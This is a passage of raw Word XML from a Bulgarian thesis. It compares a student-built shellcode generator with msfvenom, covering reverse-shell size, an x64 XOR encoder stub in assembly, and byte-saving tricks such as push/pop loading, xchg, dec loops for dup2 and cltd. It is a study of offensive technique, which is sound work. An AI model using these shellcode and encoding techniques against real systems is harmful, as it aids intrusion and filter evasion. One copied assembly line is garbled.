        <w:t xml:space="preserve">msfvenom е 74 байта, от които 3 нулеви - два за адреса и още един в инструкциите. Реализацията на инструмента има само два от адресите, но е 164 байта, тоест над двойно повече. Инструкциите за нулиране и зареждане на адреса на информация заемат голяма част от финалните байтове. Вариантът на msfvenom демонстрира ползите от употребата на многофункционални инструкции, защото с тях се елиминират повечето изрични нулирания, като се разчита на предни такива, и се пести място. Копирането на стандартен вход/изход от 30 байта са съкратени в 13 с dec </w:t>
      </w:r>
      <w:r w:rsidR="005F56EB" w:rsidRPr="00326004">
        <w:t>цикъл (</w:t>
      </w:r>
      <w:r w:rsidR="005F56EB">
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:t xml:space="preserve">обяснен </w:t>
      </w:r>
      <w:r w:rsidR="005F56EB" w:rsidRPr="00326004">
        <w:t xml:space="preserve">в т. </w:t>
      </w:r>
      <w:r w:rsidR="005F56EB" w:rsidRPr="00326004">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="005F56EB" w:rsidRPr="00326004">
        <w:instrText xml:space="preserve"> REF _Ref2191115 \r \h </w:instrText>
      </w:r>
      <w:r w:rsidR="005F56EB">
        <w:instrText xml:space="preserve"> \* MERGEFORMAT </w:instrText>
      </w:r>
      <w:r w:rsidR="005F56EB" w:rsidRPr="00326004">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="005F5FC6">
        <w:t>4.4.1.11</w:t>
      </w:r>
      <w:r w:rsidR="005F56EB" w:rsidRPr="00326004">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="005F56EB" w:rsidRPr="00326004">
        <w:t xml:space="preserve">). Това може да се постигне с комбиниран модул. Също така системна функция accept е </w:t>
      </w:r>
      <w:r w:rsidR="005F56EB" w:rsidRPr="00326004">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">твърде голяма - 37 байта, без </w:t>
      </w:r>
      <w:r w:rsidR="005F56EB" w:rsidRPr="00532C4C">
        <w:rPr>
          <w:rStyle w:val="codeChar"/>
        </w:rPr>
        <w:t>struct sockaddr</w:t>
      </w:r>
      <w:r w:rsidR="005F56EB" w:rsidRPr="00326004">
        <w:t>. Използването на push и pop (</w:t>
      </w:r>
      <w:r w:rsidR="005F56EB">
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:t xml:space="preserve">обяснени </w:t>
      </w:r>
      <w:r w:rsidR="005F56EB" w:rsidRPr="00326004">
        <w:t xml:space="preserve">в т. </w:t>
      </w:r>
      <w:r w:rsidR="005F56EB" w:rsidRPr="00326004">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="005F56EB" w:rsidRPr="00326004">
        <w:instrText xml:space="preserve"> REF _Ref2191094 \r \h </w:instrText>
      </w:r>
      <w:r w:rsidR="005F56EB">
        <w:instrText xml:space="preserve"> \* MERGEFORMAT </w:instrText>
      </w:r>
      <w:r w:rsidR="005F56EB" w:rsidRPr="00326004">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="005F5FC6">
        <w:t>4.4.1.9</w:t>
      </w:r>
      <w:r w:rsidR="005F56EB" w:rsidRPr="00326004">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="005F56EB" w:rsidRPr="00326004">
        <w:t>) комбинации се справят с този проблем. Текущата реализация дава възможност</w:t>
      </w:r>
      <w:r w:rsidR="005F56EB" w:rsidRPr="00112660">
        <w:t xml:space="preserve"> да бъде преобразувана на bind shell само с добавяне на bind и listen системни функции вместо accept.</w:t>
      </w:r>
      <w:bookmarkStart w:id="204" w:name="_tvxqqscrx530" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="204"/>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="008227E1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="205" w:name="_y3tjsnscbome" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="206" w:name="_Toc3540808"/>
      <w:bookmarkEnd w:id="205"/>
      <w:r w:rsidRPr="00112660">
        <w:t>xor encoder</w:t>
      </w:r>
      <w:bookmarkEnd w:id="206"/>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00567E8F">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Още една идентична функционалност. При разработвания инструмент това става от менюто encode или след генериране на шелкод, което съответства на последователността encode/encode shellcode -&gt; use an encoder -&gt; xor със стойности по подразбиране.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>key:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>.byte {xor_key}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>shellcode:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>.byte {shellcode}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>xor_encoder:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>movb key(%rip), %bl</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>xorl %eax, %eax</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>loop:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>leaq shellcode(%rip), %rcx</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>addq %rax, %rcx</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>xorb %bl, (%rcx)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>inc %ax</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>cmpw ${shellcode_length}, %ax</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>jl loop</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>jmp shellcode</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRDefault="005F56EB" w:rsidP="00C61194">
      <w:pPr>
        <w:pStyle w:val="figuretext"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Фигура </w:t>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> STYLEREF 1 \s </w:instrText>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="005F5FC6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:noBreakHyphen/>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC \s 1 </w:instrText>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="005F5FC6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">xor </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:t>кодиране от разработваният инструмент</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00567E8F" w:rsidRDefault="005F56EB" w:rsidP="00567E8F">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00567E8F">
        <w:t>При msfvenom може да се добави допълнителен аргумент -e x64/xor, което добавя следните инструкции, взети от сорс кода на програмата:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>xor rcx, rcx</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>sub ecx, block_count</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>lea rax, [rel 0x0]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>mov rbx, 0x????????????????</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>xor [rax+0x27], rbx</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>sub rax, -8loop 0x1B</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>loop 0x1B</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00C61194" w:rsidRDefault="005F56EB" w:rsidP="00C61194">
      <w:pPr>
        <w:pStyle w:val="figuretext"/>
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Фигура </w:t>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> STYLEREF 1 \s </w:instrText>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="005F5FC6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:noBreakHyphen/>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC \s 1 </w:instrText>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="005F5FC6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">xor </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:t xml:space="preserve">кодиране от </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>msfvenom</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00567E8F">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Отново липсват оптимизации. Модулът в инструмента добавя 34 байта върху шелкода, а msfvenom 45, макар в модула има само 38. Главните недостатъци са, че се поддържа само еднобайтов ключ и една итерация. Ако се използва dec цикъл може да се пропуснат 4те байта на cmp.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00567E8F">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:lastRenderedPageBreak/>
        <w:t>Също така jmp инструкцията може да се пропусне, ако данните са веднага след декодера.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="008227E1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="207" w:name="_z6vtsydxz6di" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="208" w:name="_Toc3540809"/>
      <w:bookmarkEnd w:id="207"/>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">Общи </w:t>
      </w:r>
      <w:r w:rsidRPr="008227E1">
        <w:t>разлики</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve"> в асемблера</w:t>
      </w:r>
      <w:bookmarkEnd w:id="208"/>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00567E8F">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Горните шелкод вариации имат разлики, които се повтарят. Тук тяхното действие е конкретизирано.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="008227E1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="209" w:name="_dz38yjxolhu6" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="210" w:name="_Toc3540810"/>
      <w:bookmarkEnd w:id="209"/>
      <w:r w:rsidRPr="008227E1">
        <w:t>Оптимизации</w:t>
      </w:r>
      <w:bookmarkEnd w:id="210"/>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00567E8F">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Msfvenom използва оптимизации, които не са изследвани в тази дипломна работа. Възползва се от по-голям набор от инструкциите на архитектурата, което дава възможност за по-интелигентен и кратък подход.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="008227E1">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:bookmarkStart w:id="211" w:name="_1cgzbhbkqeog" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="212" w:name="_Ref2191094"/>
      <w:bookmarkEnd w:id="211"/>
      <w:r w:rsidRPr="008227E1">
        <w:t>Зареждане</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve"> на данни с push, pop и mov</w:t>
      </w:r>
      <w:bookmarkEnd w:id="212"/>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00567E8F">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">Инструкцията </w:t>
      </w:r>
      <w:r w:rsidRPr="00532C4C">
        <w:rPr>
          <w:rStyle w:val="codeChar"/>
        </w:rPr>
        <w:t>movq %rsp, %rsi</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve"> е само три байта и съкращава седемте байта необходими за инструкция </w:t>
      </w:r>
      <w:r w:rsidRPr="00532C4C">
        <w:rPr>
          <w:rStyle w:val="codeChar"/>
        </w:rPr>
        <w:t>leaq</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">, много от които могат да са нулеви. Последващи push инструкции могат да пазят информация на стека за подаване на аргументи на системни функции. Също така, вместо нулиране на регистър и пазене на стойност в него, може да се използват последователни </w:t>
      </w:r>
      <w:r w:rsidRPr="00532C4C">
        <w:rPr>
          <w:rStyle w:val="codeChar"/>
        </w:rPr>
        <w:t>push</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r w:rsidRPr="00532C4C">
        <w:rPr>
          <w:rStyle w:val="codeChar"/>
        </w:rPr>
        <w:t>pop</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t>, което прави същото със само три байта над оригиналната стойност. За еднобайтови комбинации няма разлика.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="008227E1">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:bookmarkStart w:id="213" w:name="_dn5qgcl4nmpr" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="213"/>
      <w:r w:rsidRPr="008227E1">
        <w:t>xchg</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve"> %rax,%rdi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00567E8F">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">За преместване на върнатата стойност на системна функция в регистъра за първи аргумент, както се налага след </w:t>
      </w:r>
      <w:r w:rsidRPr="00532C4C">
        <w:rPr>
          <w:rStyle w:val="codeChar"/>
        </w:rPr>
        <w:t>socket()</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00532C4C">
        <w:rPr>
          <w:rStyle w:val="codeChar"/>
        </w:rPr>
        <w:t xml:space="preserve">xchg </w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">заема един байт по-малко от същия </w:t>
      </w:r>
      <w:r w:rsidRPr="00532C4C">
        <w:rPr>
          <w:rStyle w:val="codeChar"/>
        </w:rPr>
        <w:t>mov</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t>. Стойността в rax се презаписва в процеса, но там така или иначе се зарежда нов номер на системна функция.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="008227E1">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:bookmarkStart w:id="214" w:name="_rmc8exe6kcs3" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="215" w:name="_Ref2191115"/>
      <w:bookmarkEnd w:id="214"/>
      <w:r w:rsidRPr="00112660">
        <w:t>dec %rsi и jne цикъл</w:t>
      </w:r>
      <w:bookmarkEnd w:id="215"/>
    </w:p>
    <w:p w:rsidR="003A6EB4" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00326004">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00567E8F">
        <w:rPr>
          <w:rStyle w:val="bodyChar"/>
        </w:rPr>
        <w:t xml:space="preserve">За копиране на сокет на stdin, stdout и stderr трябват три извиквания на </w:t>
      </w:r>
      <w:r w:rsidRPr="00532C4C">
        <w:rPr>
          <w:rStyle w:val="codeChar"/>
        </w:rPr>
        <w:t>dup2()</w:t>
      </w:r>
      <w:r w:rsidRPr="00567E8F">
        <w:rPr>
          <w:rStyle w:val="bodyChar"/>
        </w:rPr>
        <w:t xml:space="preserve">. Алтернативно може да се използва цикъл, който брои към 0 в регистър rsi (втори параметър). Инструкцията dec вдига флага за нула, което елиминира допълнителна cmp инструкция. Така с две инструкции замества кода за приготвяне на още две системни функции. Допълнителна оптимизация може да </w:t>
      </w:r>
      <w:r w:rsidRPr="00567E8F">
        <w:rPr>
          <w:rStyle w:val="bodyChar"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">бъде употребата на инструкцията </w:t>
      </w:r>
      <w:r w:rsidRPr="00532C4C">
        <w:rPr>
          <w:rStyle w:val="codeChar"/>
        </w:rPr>
        <w:t>loop</w:t>
      </w:r>
      <w:r w:rsidRPr="00567E8F">
        <w:rPr>
          <w:rStyle w:val="bodyChar"/>
        </w:rPr>
        <w:t>, която обединява двете инструкции, ако броячът може да се съхранява в rcx. Тази инструкция не се използва в реални програми заради лошата</w:t>
      </w:r>
      <w:r w:rsidRPr="00326004">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>ѝ</w:t>
      </w:r>
      <w:r w:rsidRPr="00567E8F">
        <w:rPr>
          <w:rStyle w:val="bodyChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> производителност</w:t>
      </w:r>
      <w:r w:rsidR="000B2140">
        <w:rPr>
          <w:rStyle w:val="bodyChar"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="000B2140" w:rsidRPr="00567E8F">
        <w:rPr>
          <w:rStyle w:val="bodyChar"/>
        </w:rPr>
        <w:endnoteReference w:id="40"/>
      </w:r>
      <w:r w:rsidR="000B2140">
        <w:rPr>
          <w:rStyle w:val="bodyChar"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidRPr="00567E8F">
        <w:rPr>
          <w:rStyle w:val="bodyChar"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="003A6EB4" w:rsidRPr="00567E8F">
        <w:rPr>
          <w:rStyle w:val="bodyChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> но тук това не е от значение</w:t>
      </w:r>
      <w:r w:rsidR="003A6EB4" w:rsidRPr="00112660">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A6EB4" w:rsidRPr="00112660" w:rsidRDefault="003A6EB4" w:rsidP="008227E1">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:bookmarkStart w:id="216" w:name="_cbcdjsnpw7kl" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="216"/>
      <w:r w:rsidRPr="008227E1">
        <w:t>cltd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A6EB4" w:rsidRPr="00112660" w:rsidRDefault="003A6EB4" w:rsidP="00CF6AEC">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">Тази инструкция копира бита за знак от eax в edx. Стойностите в rax обикновено са положителни (номер на системна функция) и ефектът на инструкцията е нулиране на edx. Ефективно се постига функционалността на </w:t>
      </w:r>
      <w:r w:rsidRPr="00532C4C">
        <w:rPr>
          <w:rStyle w:val="codeChar"/>
        </w:rPr>
        <w:t>xorl %edx, %edx</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t>, само с един байт.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A6EB4" w:rsidRPr="00112660" w:rsidRDefault="003A6EB4" w:rsidP="008227E1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="217" w:name="_1fuvjhnkpbgx" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="218" w:name="_Toc3540811"/>
      <w:bookmarkEnd w:id="217"/>
      <w:r w:rsidRPr="008227E1">
        <w:t>Информация</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve"> за дебъгване</w:t>
      </w:r>
      <w:bookmarkEnd w:id="218"/>
    </w:p>
    <w:p w:rsidR="003A6EB4" w:rsidRPr="00112660" w:rsidRDefault="003A6EB4" w:rsidP="00567E8F">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Тестването на шелкод в msfvenom не е възможно, но се разчита, че не е необходимо, защото се предполага, че реализациите са цялостни и тествани. За принос към проекта трябва да се изпрати “pull request”, който подлежи на преглед от други хора. Използват се други модули от Metasploit за използване на готовия шелкод, макар че това не е точно тест.</w:t>
      </w:r>
    </w:p>
